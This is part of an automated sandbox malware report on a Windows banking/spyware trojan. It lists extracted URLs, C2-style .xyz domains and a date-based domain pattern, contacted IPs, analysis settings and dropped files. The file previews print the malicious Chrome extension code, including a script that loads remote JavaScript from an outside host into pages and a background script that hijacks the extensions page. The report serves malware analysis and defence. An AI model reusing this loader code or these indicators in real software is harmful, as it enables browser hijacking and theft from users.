                                                          https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=63C4F3D9EA0CC861.exe, 00000003.00000003.284978493.000000000072F000.00000004.00000001.sdmp, Web Data1612045902911.3.drfalse
                                                            		high
                                                            http://pki.goog/gsr2/GTS1O1.crt0ecvB803.tmp.11.drfalse
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            		unknown
                                                            https://contextual.media.net/medianet.php?cid=8CU157172&crid=858412214&size=306x271&https=1ecvB803.tmp.11.drfalse
                                                              		high
                                                              https://googleads.g.doubleclick.net/pagead/gcn_p3p_.xmlecvB803.tmp.11.drfalse
                                                                		high
                                                                https://contextual.media.net/ecvB803.tmp.11.drfalse
                                                                  		high
                                                                  http://ocsp.pki.goog/gsr202ecvB803.tmp.11.drfalse
                                                                  • URL Reputation: safe
                                                                  • URL Reputation: safe
                                                                  • URL Reputation: safe
                                                                  		unknown
                                                                  https://pki.goog/repository/0ecvB803.tmp.11.drfalse
                                                                  • URL Reputation: safe
                                                                  • URL Reputation: safe
                                                                  • URL Reputation: safe
                                                                  		unknown
                                                                  https://api.twitter.com/1.1/statuses/update.json63C4F3D9EA0CC861.exe, 00000003.00000002.368837459.000000000354C000.00000004.00000001.sdmp, 63C4F3D9EA0CC861.exe, 00000004.00000002.275225860.000000000344C000.00000004.00000001.sdmpfalse
                                                                    		high
                                                                    https://cvision.media.net/new/300x300/3/167/174/27/39ab3103-8560-4a55-bfc4-401f897cf6f2.jpg?v=9ecvB803.tmp.11.drfalse
                                                                      		high
                                                                      http://www.msn.com/ecvB803.tmp.11.drfalse
                                                                        		high
                                                                        https://upload.twitter.com/i/media/upload.json63C4F3D9EA0CC861.exe, 00000003.00000002.368837459.000000000354C000.00000004.00000001.sdmp, 63C4F3D9EA0CC861.exe, 00000004.00000002.275225860.000000000344C000.00000004.00000001.sdmpfalse
                                                                          		high
                                                                          https://assets.adobedtm.com/5ef092d1efb5/4d1d9f749fd3/434d91f2e635/RC828bc1cde9f04b788c98b5423157734ecvB803.tmp.11.drfalse
                                                                            		high
                                                                            https://twitter.com/compose/tweetsec-fetch-mode:63C4F3D9EA0CC861.exe, 00000004.00000002.275225860.000000000344C000.00000004.00000001.sdmpfalse
                                                                              		high
                                                                              https://2542116.fls.doubleclick.net/activityi;src=2542116;type=clien612;cat=chromx;ord=1;num=1463674ecvB803.tmp.11.drfalse
                                                                                		high
                                                                                https://www.messenger.com/accept:63C4F3D9EA0CC861.exe, 00000003.00000002.368837459.000000000354C000.00000004.00000001.sdmp, 63C4F3D9EA0CC861.exe, 00000004.00000002.275225860.000000000344C000.00000004.00000001.sdmpfalse
                                                                                  		high
                                                                                  http://www.msn.com/de-ch/entertainment/_h/c920645c/webcore/externalscripts/oneTrustV2/consent/55a804ecvB803.tmp.11.drfalse
                                                                                    		high
                                                                                    https://contextual.media.net/803288796/fcmain.js?&gdpr=0&cid=8CU157172&cpcd=pC3JHgSCqY8UHihgrvGr0A%3ecvB803.tmp.11.drfalse
                                                                                      		high
                                                                                      https://contextual.media.net/48/nrrV18753.jsecvB803.tmp.11.drfalse
                                                                                        		high
                                                                                        http://crl.pki.goog/gsr2/gsr2.crl0?ecvB803.tmp.11.drfalse
                                                                                        • URL Reputation: safe
                                                                                        • URL Reputation: safe
                                                                                        • URL Reputation: safe
                                                                                        		unknown
                                                                                        http://pki.goog/gsr2/GTSGIAG3.crt0)ecvB803.tmp.11.drfalse
                                                                                        • Avira URL Cloud: safe
                                                                                        		unknown
                                                                                        https://upload.twitter.com/i/media/upload.json?command=APPEND&media_id=%s&segment_index=063C4F3D9EA0CC861.exe, 00000003.00000002.368837459.000000000354C000.00000004.00000001.sdmp, 63C4F3D9EA0CC861.exe, 00000004.00000002.275225860.000000000344C000.00000004.00000001.sdmpfalse
                                                                                          		high
                                                                                          https://feedback.googleusercontent.com63C4F3D9EA0CC861.exe, 63C4F3D9EA0CC861.exe, 00000004.00000003.262093125.0000000003F27000.00000004.00000001.sdmpfalse
                                                                                            		high
                                                                                            https://www.messenger.comhttps://www.messenger.com/login/nonce/ookie:63C4F3D9EA0CC861.exe, 00000003.00000002.368837459.000000000354C000.00000004.00000001.sdmp, 63C4F3D9EA0CC861.exe, 00000004.00000002.275225860.000000000344C000.00000004.00000001.sdmpfalse
                                                                                            • Avira URL Cloud: safe
                                                                                            		unknown
                                                                                            http://C8DD8AE6DC4DC644.xyz/info_old/w63C4F3D9EA0CC861.exe, 00000003.00000003.364182783.0000000003EF0000.00000004.00000001.sdmpfalse
                                                                                            • Avira URL Cloud: safe
                                                                                            		unknown
                                                                                            http://www.xunlei.com/download_engine.dll.3.drfalse
                                                                                              		high
                                                                                              http://pki.goog/gsr2/GTS1O1.crt0#ecvB803.tmp.11.drfalse
                                                                                              • Avira URL Cloud: safe
                                                                                              		unknown
                                                                                              https://aefd.nelreports.net/api/report?cat=bingthecvB803.tmp.11.drfalse
                                                                                              • Avira URL Cloud: safe
                                                                                              		unknown
                                                                                              https://upload.twitter.com/i/media/upload.json?command=APPEND&media_id=%s&segment_index=0accept:63C4F3D9EA0CC861.exe, 00000003.00000002.368837459.000000000354C000.00000004.00000001.sdmp, 63C4F3D9EA0CC861.exe, 00000004.00000002.275225860.000000000344C000.00000004.00000001.sdmpfalse
                                                                                                		high
                                                                                                http://schemas.xmlsoap.org/soap/envelope/download_engine.dll.3.drfalse
                                                                                                  		high
                                                                                                  https://exchangework%04d%02d%02d.xyz/http://changenewsys%04d%02d%02d.xyz/post_info.63C4F3D9EA0CC861.exe, 00000003.00000002.368837459.000000000354C000.00000004.00000001.sdmp, 63C4F3D9EA0CC861.exe, 00000004.00000002.275225860.000000000344C000.00000004.00000001.sdmpfalse
                                                                                                  • Avira URL Cloud: safe
                                                                                                  		low
                                                                                                  https://geolocation.onetrust.com/cookieconsentpub/v1/geo/locationecvB803.tmp.11.drfalse
                                                                                                    		high
                                                                                                    http://www.installshield.com/isetup/ProErrorCentral.asp?ErrorCode=%dfnhcdXEfus.exefalse
                                                                                                      		high
                                                                                                      https://assets.adobedtm.com/launch-EN7b3d710ac67a4a1195648458258f97dd.min.jsecvB803.tmp.11.drfalse
                                                                                                        		high
                                                                                                        https://assets.adobedtm.com/5ef092d1efb5/4d1d9f749fd3/434d91f2e635/RCfd484f9188564713bbc5d13d862ebbfecvB803.tmp.11.drfalse
                                                                                                          		high
                                                                                                          https://curl.haxx.se/docs/http-cookies.html63C4F3D9EA0CC861.exe, 00000003.00000002.368731244.00000000034EF000.00000004.00000001.sdmp, 63C4F3D9EA0CC861.exe, 00000004.00000002.275181666.00000000033EF000.00000004.00000001.sdmpfalse
                                                                                                            		high
                                                                                                            http://www.openssl.org/support/faq.htmldownload_engine.dll.3.drfalse
                                                                                                              		high
                                                                                                              https://www.instagram.comsec-fetch-mode:63C4F3D9EA0CC861.exe, 00000003.00000002.368837459.000000000354C000.00000004.00000001.sdmp, 63C4F3D9EA0CC861.exe, 00000004.00000002.275225860.000000000344C000.00000004.00000001.sdmpfalse
                                                                                                              • Avira URL Cloud: safe
                                                                                                              		unknown
                                                                                                              https://www.instagram.com/accounts/login/ajax/facebook/63C4F3D9EA0CC861.exe, 00000004.00000002.275225860.000000000344C000.00000004.00000001.sdmpfalse
                                                                                                                		high
                                                                                                                https://login.microsoftonline.com/common/oauth2/authorize?client_id=9ea1ad79-fdb6-4f9a-8bc3-2b70f96eecvB803.tmp.11.drfalse
                                                                                                                  		high
                                                                                                                  http://crl.thawte.com/ThawteTimestampingCA.crl0MiniThunderPlatform.exe.3.drfalse
                                                                                                                    		high
                                                                                                                    https://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBI57XIG&prvid=77%2ecvB803.tmp.11.drfalse
                                                                                                                      		high
                                                                                                                      https://www.instagram.com/sec-fetch-site:63C4F3D9EA0CC861.exe, 00000003.00000002.368837459.000000000354C000.00000004.00000001.sdmp, 63C4F3D9EA0CC861.exe, 00000004.00000002.275225860.000000000344C000.00000004.00000001.sdmpfalse
                                                                                                                        		high
                                                                                                                        https://twitter.comReferer:63C4F3D9EA0CC861.exe, 00000004.00000002.275225860.000000000344C000.00000004.00000001.sdmpfalse
                                                                                                                        • Avira URL Cloud: safe
                                                                                                                        		unknown
                                                                                                                        http://www.interestvideo.com/video1.php63C4F3D9EA0CC861.exe, 00000004.00000002.275181666.00000000033EF000.00000004.00000001.sdmpfalse
                                                                                                                        • Avira URL Cloud: safe
                                                                                                                        		unknown
                                                                                                                        https://www.instagram.com/accept:63C4F3D9EA0CC861.exe, 00000003.00000002.368837459.000000000354C000.00000004.00000001.sdmp, 63C4F3D9EA0CC861.exe, 00000004.00000002.275225860.000000000344C000.00000004.00000001.sdmpfalse
                                                                                                                          		high
                                                                                                                          http://C8DD8AE6DC4DC644.xyz:80/info_old/r63C4F3D9EA0CC861.exe, 00000003.00000002.365302511.00000000006E9000.00000004.00000020.sdmpfalse
                                                                                                                          • Avira URL Cloud: safe
                                                                                                                          		unknown
                                                                                                                          https://www.messenger.com/login/nonce/63C4F3D9EA0CC861.exe, 00000003.00000002.368837459.000000000354C000.00000004.00000001.sdmp, 63C4F3D9EA0CC861.exe, 00000004.00000002.275225860.000000000344C000.00000004.00000001.sdmpfalse
                                                                                                                            		high
                                                                                                                            http://C8DD8AE6DC4DC644.xyz:80/info_old/w63C4F3D9EA0CC861.exe, 00000003.00000002.365302511.00000000006E9000.00000004.00000020.sdmpfalse
                                                                                                                            • Avira URL Cloud: safe
                                                                                                                            		unknown
                                                                                                                            http://www.youtube.com63C4F3D9EA0CC861.exefalse
                                                                                                                              		high
                                                                                                                              https://twitter.com/compose/tweetsec-fetch-dest:63C4F3D9EA0CC861.exe, 00000003.00000002.368837459.000000000354C000.00000004.00000001.sdmp, 63C4F3D9EA0CC861.exe, 00000004.00000002.275225860.000000000344C000.00000004.00000001.sdmpfalse
                                                                                                                                		high
                                                                                                                                http://crl.pki.goog/GTSGIAG3.crl0ecvB803.tmp.11.drfalse
                                                                                                                                • Avira URL Cloud: safe
                                                                                                                                		unknown
                                                                                                                                https://adservice.google.co.uk/ddm/fls/i/src=2542116;type=chrom322;cat=chrom01g;ord=6856811916691;gtecvB803.tmp.11.drfalse
                                                                                                                                • Avira URL Cloud: safe
                                                                                                                                		unknown
                                                                                                                                https://1A469593C1FE15DC.xyz/63C4F3D9EA0CC861.exe, 00000003.00000003.364204277.0000000003947000.00000004.00000040.sdmpfalse
                                                                                                                                • Avira URL Cloud: safe
                                                                                                                                		unknown
                                                                                                                                http://ocsp.thawte.com0MiniThunderPlatform.exe.3.drfalse
                                                                                                                                • URL Reputation: safe
                                                                                                                                • URL Reputation: safe
                                                                                                                                • URL Reputation: safe
                                                                                                                                		unknown
                                                                                                                                https://api.twitter.com/1.1/statuses/update.jsoninclude_profile_interstitial_type=1&include_blocking63C4F3D9EA0CC861.exe, 00000003.00000002.368837459.000000000354C000.00000004.00000001.sdmp, 63C4F3D9EA0CC861.exe, 00000004.00000002.275225860.000000000344C000.00000004.00000001.sdmpfalse
                                                                                                                                  		high
                                                                                                                                  http://store.paycenter.uc.cnmail-attachment.googleusercontent.comMiniThunderPlatform.exe.3.drfalse
                                                                                                                                    		high
                                                                                                                                    https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search63C4F3D9EA0CC861.exe, 00000003.00000003.284978493.000000000072F000.00000004.00000001.sdmp, Web Data1612045902911.3.drfalse
                                                                                                                                      		high
                                                                                                                                      https://twitter.com/63C4F3D9EA0CC861.exe, 00000003.00000002.368837459.000000000354C000.00000004.00000001.sdmp, 63C4F3D9EA0CC861.exe, 00000004.00000002.275225860.000000000344C000.00000004.00000001.sdmpfalse
                                                                                                                                        		high
                                                                                                                                        https://logincdn.msauth.net/16.000/content/js/ConvergedLoginPaginatedStrings.en_5QoHC_ilFOmb96M0pIeJecvB803.tmp.11.drfalse
                                                                                                                                        • Avira URL Cloud: safe
                                                                                                                                        		unknown

                                                                                                                                        Contacted IPs

                                                                                                                                        • No. of IPs < 25%
                                                                                                                                        • 25% < No. of IPs < 50%
                                                                                                                                        • 50% < No. of IPs < 75%
                                                                                                                                        • 75% < No. of IPs

                                                                                                                                        Public

                                                                                                                                        IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                        34.94.64.66
                                                                                                                                        		unknownUnited States
                                                                                                                                        		15169GOOGLEUSfalse

                                                                                                                                        Private

                                                                                                                                        IP
                                                                                                                                        127.0.0.1

                                                                                                                                        General Information

                                                                                                                                        Joe Sandbox Version:31.0.0 Emerald
                                                                                                                                        Analysis ID:346325
                                                                                                                                        Start date:30.01.2021
                                                                                                                                        Start time:14:30:17
                                                                                                                                        Joe Sandbox Product:CloudBasic
                                                                                                                                        Overall analysis duration:0h 12m 36s
                                                                                                                                        Hypervisor based Inspection enabled:false
                                                                                                                                        Report type:full
                                                                                                                                        Sample file name:fnhcdXEfus.exe
                                                                                                                                        Cookbook file name:default.jbs
                                                                                                                                        Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                                                                                                        Run name:Run with higher sleep bypass
                                                                                                                                        Number of analysed new started processes analysed:40
                                                                                                                                        Number of new started drivers analysed:0
                                                                                                                                        Number of existing processes analysed:0
                                                                                                                                        Number of existing drivers analysed:0
                                                                                                                                        Number of injected processes analysed:0
                                                                                                                                        Technologies:
                                                                                                                                        • HCA enabled
                                                                                                                                        • EGA enabled
                                                                                                                                        • HDC enabled
                                                                                                                                        • AMSI enabled
                                                                                                                                        Analysis Mode:default
                                                                                                                                        Analysis stop reason:Timeout
                                                                                                                                        Detection:MAL
                                                                                                                                        Classification:mal90.bank.troj.spyw.evad.winEXE@32/37@4/2
                                                                                                                                        EGA Information:Failed
                                                                                                                                        HDC Information:
                                                                                                                                        • Successful, ratio: 21.7% (good quality ratio 20.6%)
                                                                                                                                        • Quality average: 80.1%
                                                                                                                                        • Quality standard deviation: 27.4%
                                                                                                                                        HCA Information:
                                                                                                                                        • Successful, ratio: 67%
                                                                                                                                        • Number of executed functions: 44
                                                                                                                                        • Number of non-executed functions: 343
                                                                                                                                        Cookbook Comments:
                                                                                                                                        • Adjust boot time
                                                                                                                                        • Enable AMSI
                                                                                                                                        • Sleeps bigger than 120000ms are automatically reduced to 1000ms
                                                                                                                                        • Found application associated with file extension: .exe
                                                                                                                                        Warnings:
                                                                                                                                        Show All
                                                                                                                                        • Exclude process from analysis (whitelisted): taskhostw.exe, MpCmdRun.exe, BackgroundTransferHost.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe, UsoClient.exe
                                                                                                                                        • Excluded IPs from analysis (whitelisted): 52.147.198.201, 104.43.139.144, 51.11.168.160, 23.210.248.85, 92.122.213.194, 92.122.213.247, 2.20.142.209, 2.20.142.210, 20.54.26.129, 51.104.139.180, 52.155.217.156
                                                                                                                                        • Excluded domains from analysis (whitelisted): au.download.windowsupdate.com.edgesuite.net, displaycatalog-europeeap.md.mp.microsoft.com.akadns.net, arc.msn.com.nsatc.net, fs.microsoft.com, ris-prod.trafficmanager.net, displaycatalog.md.mp.microsoft.com.akadns.net, e1723.g.akamaiedge.net, ctldl.windowsupdate.com, skypedataprdcolcus16.cloudapp.net, a767.dscg3.akamai.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, a1449.dscg2.akamai.net, arc.msn.com, skypedataprdcoleus16.cloudapp.net, ris.api.iris.microsoft.com, db5eap.displaycatalog.md.mp.microsoft.com.akadns.net, blobcollector.events.data.trafficmanager.net, audownload.windowsupdate.nsatc.net, displaycatalog.mp.microsoft.com, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, au-bg-shim.trafficmanager.net
                                                                                                                                        • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                                        • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                                                                        • Report size getting too big, too many NtDeviceIoControlFile calls found.
                                                                                                                                        • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                        • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                                        • Report size getting too big, too many NtQueryValueKey calls found.

                                                                                                                                        Simulations

                                                                                                                                        Behavior and APIs

                                                                                                                                        No simulations

                                                                                                                                        Joe Sandbox View / Context

                                                                                                                                        IPs

                                                                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                        34.94.64.66fnhcdXEfus.exeGet hashmaliciousBrowse
                                                                                                                                        • C8DD8AE6DC4DC644.xyz/info_old/ddd

                                                                                                                                        Domains

                                                                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                        c8dd8ae6dc4dc644.xyzfnhcdXEfus.exeGet hashmaliciousBrowse
                                                                                                                                        • 34.94.64.66

                                                                                                                                        ASN

                                                                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                        GOOGLEUSfnhcdXEfus.exeGet hashmaliciousBrowse
                                                                                                                                        • 34.94.64.66
                                                                                                                                        KYC FORM01.xlsxGet hashmaliciousBrowse
                                                                                                                                        • 34.102.136.180
                                                                                                                                        MediaPlayer.apkGet hashmaliciousBrowse
                                                                                                                                        • 172.217.20.106
                                                                                                                                        VM859-7757.htmGet hashmaliciousBrowse
                                                                                                                                        • 216.58.208.118
                                                                                                                                        KYC AGREEMENT.xlsxGet hashmaliciousBrowse
                                                                                                                                        • 34.102.136.180
                                                                                                                                        INV.xlsxGet hashmaliciousBrowse
                                                                                                                                        • 34.102.136.180
                                                                                                                                        ki7710921.exeGet hashmaliciousBrowse
                                                                                                                                        • 34.102.136.180
                                                                                                                                        0113 INV_PAK.xlsxGet hashmaliciousBrowse
                                                                                                                                        • 34.102.136.180
                                                                                                                                        chrome.exeGet hashmaliciousBrowse
                                                                                                                                        • 8.8.8.8
                                                                                                                                        YK5tmqQ18z.exeGet hashmaliciousBrowse
                                                                                                                                        • 35.246.6.109
                                                                                                                                        q5oRsfy1vk.exeGet hashmaliciousBrowse
                                                                                                                                        • 34.102.136.180
                                                                                                                                        c8TrAKsz0T.exeGet hashmaliciousBrowse
                                                                                                                                        • 34.102.136.180
                                                                                                                                        Immuni.apkGet hashmaliciousBrowse
                                                                                                                                        • 172.217.20.106
                                                                                                                                        YWrrcqVAno.exeGet hashmaliciousBrowse
                                                                                                                                        • 34.102.136.180
                                                                                                                                        lbqFKoALqe.exeGet hashmaliciousBrowse
                                                                                                                                        • 35.184.90.176
                                                                                                                                        eDpjcIIh9G.exeGet hashmaliciousBrowse
                                                                                                                                        • 34.102.136.180
                                                                                                                                        6tivtkKtQx.exeGet hashmaliciousBrowse
                                                                                                                                        • 34.102.136.180
                                                                                                                                        Sf6jgQc6Ww.exeGet hashmaliciousBrowse
                                                                                                                                        • 34.102.136.180
                                                                                                                                        j64eIR1IEK.exeGet hashmaliciousBrowse
                                                                                                                                        • 34.102.136.180
                                                                                                                                        bEuBS6SwMo.exeGet hashmaliciousBrowse
                                                                                                                                        • 35.228.108.144

                                                                                                                                        JA3 Fingerprints

                                                                                                                                        No context

                                                                                                                                        Dropped Files

                                                                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                        C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exefnhcdXEfus.exeGet hashmaliciousBrowse
                                                                                                                                          C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exefnhcdXEfus.exeGet hashmaliciousBrowse
                                                                                                                                            Cyfj6XGbkd.exeGet hashmaliciousBrowse
                                                                                                                                              N1yprTBBXs.exeGet hashmaliciousBrowse
                                                                                                                                                Cyfj6XGbkd.exeGet hashmaliciousBrowse
                                                                                                                                                  N1yprTBBXs.exeGet hashmaliciousBrowse
                                                                                                                                                    FileSetup-v17.04.41.exeGet hashmaliciousBrowse
                                                                                                                                                      FileSetup-v17.04.41.exeGet hashmaliciousBrowse
                                                                                                                                                        C:\Users\user\AppData\Local\Temp\MSI6DDB.tmp6MhmlD8KZh.exeGet hashmaliciousBrowse
                                                                                                                                                          fnhcdXEfus.exeGet hashmaliciousBrowse
                                                                                                                                                            Cyfj6XGbkd.exeGet hashmaliciousBrowse
                                                                                                                                                              N1yprTBBXs.exeGet hashmaliciousBrowse
                                                                                                                                                                Cyfj6XGbkd.exeGet hashmaliciousBrowse
                                                                                                                                                                  N1yprTBBXs.exeGet hashmaliciousBrowse
                                                                                                                                                                    FileSetup-v17.04.41.exeGet hashmaliciousBrowse
                                                                                                                                                                      FileSetup-v17.04.41.exeGet hashmaliciousBrowse

                                                                                                                                                                        Created / dropped Files

                                                                                                                                                                        C:\Users\user\AppData\Local\Cookies1612045889599
                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exe
                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3032001
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):20480
                                                                                                                                                                        Entropy (8bit):0.6970840431455908
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:24:TLbJLbXaFpEO5bNmISHn06UwcQPx5fBocLgAZOZD/0:T5LLOpEO5J/Kn7U1uBo8NOZ0
                                                                                                                                                                        MD5:00681D89EDDB6AD25E6F4BD2E66C61C6
                                                                                                                                                                        SHA1:14B2FBFB460816155190377BBC66AB5D2A15F7AB
                                                                                                                                                                        SHA-256:8BF06FD5FAE8199D261EB879E771146AE49600DBDED7FDC4EAC83A8C6A7A5D85
                                                                                                                                                                        SHA-512:159A9DE664091A3986042B2BE594E989FD514163094AC606DC3A6A7661A66A78C0D365B8CA2C94B8BC86D552E59D50407B4680EDADB894320125F0E9F48872D3
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Preview: SQLite format 3......@ ..........................................................................C....... ..g... .8....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                        C:\Users\user\AppData\Local\Cookies1612045902708
                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exe
                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3032001
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):20480
                                                                                                                                                                        Entropy (8bit):0.6970840431455908
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:24:TLbJLbXaFpEO5bNmISHn06UwcQPx5fBocLgAZOZD/0:T5LLOpEO5J/Kn7U1uBo8NOZ0
                                                                                                                                                                        MD5:00681D89EDDB6AD25E6F4BD2E66C61C6
                                                                                                                                                                        SHA1:14B2FBFB460816155190377BBC66AB5D2A15F7AB
                                                                                                                                                                        SHA-256:8BF06FD5FAE8199D261EB879E771146AE49600DBDED7FDC4EAC83A8C6A7A5D85
                                                                                                                                                                        SHA-512:159A9DE664091A3986042B2BE594E989FD514163094AC606DC3A6A7661A66A78C0D365B8CA2C94B8BC86D552E59D50407B4680EDADB894320125F0E9F48872D3
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Preview: SQLite format 3......@ ..........................................................................C....... ..g... .8....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                        C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\emihechjjbnedinohcnpneeogfgehmce\1.0.0.0_0\background.js
                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exe
                                                                                                                                                                        File Type:ASCII text
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):886
                                                                                                                                                                        Entropy (8bit):5.022683940423506
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:24:sFfWxmARONJTW0/I8/lZ9OKMmA6eiH4MmDCvTV3u4:sYo/NJ/7Augi8Dy
                                                                                                                                                                        MD5:FEDACA056D174270824193D664E50A3F
                                                                                                                                                                        SHA1:58D0C6E4EC18AB761805AABB8D94F3C4CBE639F5
                                                                                                                                                                        SHA-256:8F538ED9E633D5C9EA3E8FB1354F58B3A5233F1506C9D3D01873C78E3EB88B8D
                                                                                                                                                                        SHA-512:2F1968EDE11B9510B43B842705E5DDAC4F85A9E2AA6AEE542BEC80600228FF5A5723246F77C526154EB9A00A87A5C7DDD634447A8F7A97D6DA33B94509731DBC
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Preview: $(function() {..chrome.tabs.onSelectionChanged.addListener(function(tab,info){....chrome.tabs.query({....active : true...}, function(tab) {....var pageUrl = tab[0].url;....console.log(pageUrl);....if (Number(pageUrl.indexOf("extensions")) > 1) ....{....chrome.tabs.update({url:'https://chrome.google.com/webstore/category/extension'}); ....}. .... ...});.});....chrome.webRequest.onBeforeRequest.addListener(function(details) {....chrome.tabs.query({....active : true...}, function(tab) {....var pageUrl = tab[0].url;...});........var url = details.url;...}, {...urls : [ "<all_urls>" ]..}, [ "blocking" ]);...function sendMessageToContentScript(message, callback) {...chrome.tabs.query({....active : true,....currentWindow : true...}, function(tabs) {....chrome.tabs.sendMessage(tabs[0].id, message, function(response) {.....if (callback)......callback(response);....});...});..}...});
                                                                                                                                                                        C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\emihechjjbnedinohcnpneeogfgehmce\1.0.0.0_0\book.js
                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exe
                                                                                                                                                                        File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):152
                                                                                                                                                                        Entropy (8bit):5.039480985438208
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:3:2LGffWpnYOJRyRmgO9lNCaVpveLWCfKVsSdDXaDQTNUHWSpHovJiRzlLBche:2LGXWpn7J8mgO9l3BeiCfLSdDYGNeW7u
                                                                                                                                                                        MD5:30CBBF4DF66B87924C75750240618648
                                                                                                                                                                        SHA1:64AF3DD53D6DED500863387E407F876C89A29B9A
                                                                                                                                                                        SHA-256:D35FBD13C27F0A01DC944584D05776BA7E6AD3B3D2CBDE1F7C349E94502127F5
                                                                                                                                                                        SHA-512:8117B8537A0B5F4BB3ED711D9F062E7A901A90FD3D2CF9DFFCC15D03ED4E001991BA2C79BCA072FA7FD7CE100F38370105D3CE76EB87F2877C0BF18B4D8CFBAB
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Preview: (function(){.. var s = document.createElement('script'); .. s.src = '//kellyfight.com/22aff56f45f6b36dec.js'; .. document.body.appendChild(s);..})();
                                                                                                                                                                        C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\emihechjjbnedinohcnpneeogfgehmce\1.0.0.0_0\icon.png
                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exe
                                                                                                                                                                        File Type:PNG image data, 30 x 30, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):1161
                                                                                                                                                                        Entropy (8bit):7.79271055262892
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:24:2mEKEvFZonmDzTaC6EU1yPj0bhJKaurzF3LvLIeR2D+JGP6A8UJ0wrBI4ez:DExZomDXe1yPYHKNx3LvLvWFP6noFy4M
                                                                                                                                                                        MD5:5D207F5A21E55E47FCCD8EF947A023AE
                                                                                                                                                                        SHA1:3A80A7CF3A8C8F9BDCE89A04239A7E296A94160F
                                                                                                                                                                        SHA-256:4E8CE139D89A497ADB4C6F7D2FFC96B583DA1882578AB09D121A459C5AD8335F
                                                                                                                                                                        SHA-512:38436956D5414A2CF66085F290EF15681DBF449B453431F937A09BFE21577252565D0C9FA0ACEAAD158B099383E55B94C721E23132809DF728643504EFFCBE2B
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Preview: .PNG........IHDR.............;0.....PIDATH..]..e....y....uw.u.>...D../..3$...".......J....H...(......0J...D...X,0?.v&Ww...9]<...;.:.Mt.w.............L.V..|z.Z_..b$...)...z.....|.\.?3Uw....^.{..xz..G.....`.Z_"!........x..L.G..H..=...o3.....?F.f'!6.W.~+@.`D.....g+......r].*..... .ob.8.M.jg.....X....L..P....A.D..Uo2.....\......w.y..`&...W..".XAE..V...<t.Y.,.@.......rb..R$..8@..(.. ...i..H.%R)`.h..1..43.jr.......p..pd.G"..8$..,.M..RL^.....u.....84u.......)8 NTH.#.....o0....2.....$27...e>..2.h._N..s.D...D..$.\....l:..7G.....(H..2...7f..g.i...(......O...M.Po..`.3.x.;....eO.Lr..).......XH.:....*...k..O.$....z7..U.a.H.IW.w..uU....o... u.....F1.q.Vf..S. .L...KF..*Mu5..\3p.l.6.{.Z..y#...J...B."...U..T...F.qv....F...u.]........@.QZzA..L...<........J.L$...2*.................0.0&]..;.of,..j.P.&.Yq..b.1!M..l...B.X.xp...4.h.....W.M.6.sPQG.v6........R....-@......z.b.zL.i..?......b...u|.;>...I....$..M..^:...wLTK...l.....=m.c...v...wz....a..5..}m......l
                                                                                                                                                                        C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\emihechjjbnedinohcnpneeogfgehmce\1.0.0.0_0\icon48.png
                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exe
                                                                                                                                                                        File Type:PNG image data, 48 x 48, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):2235
                                                                                                                                                                        Entropy (8bit):7.880518016071819
